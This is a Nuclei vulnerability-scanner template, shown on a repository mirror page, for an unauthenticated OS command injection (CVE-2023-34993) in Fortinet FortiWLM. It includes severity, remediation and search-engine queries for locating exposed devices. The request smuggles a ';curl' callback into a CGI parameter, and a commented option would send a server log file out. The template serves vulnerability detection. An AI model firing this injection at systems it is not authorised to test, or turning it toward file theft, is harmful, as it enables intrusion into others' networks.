daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-34993.yaml

59 lines
2.1 KiB
YAML
Raw Blame History

id: CVE-2023-34993
info:
name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
author: dwisiswant0
severity: critical
description: |
A improper neutralization of special elements used in an os command ('os
command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
Successful exploitation of this vulnerability could allow an attacker to
bypass authentication and gain unauthorized access to the affected system.
remediation: |
For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
reference:
- https://fortiguard.com/psirt/FG-IR-23-140
- https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34993
cwe-id: CWE-78
epss-score: 0.96644
epss-percentile: 0.99631
cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fortinet
product: fortiwlm
shodan-query:
- http.title:"FortiWLM"
- http.html:"fortiwlm"
- http.title:"fortiwlm"
fofa-query:
- body="fortiwlm"
- title="fortiwlm"
google-query: intitle:"fortiwlm"
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
variables:
progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
http:
- method: GET
path:
- "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 490a0046304402205a332f7b02191f50bbdffc0c070e03f669898fd78fd7b47176911f36a6231f5702203ad403ffd2de74ac672ebe4c762a1c1b56bb9ab395485fa85fade4d08e0e046b:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink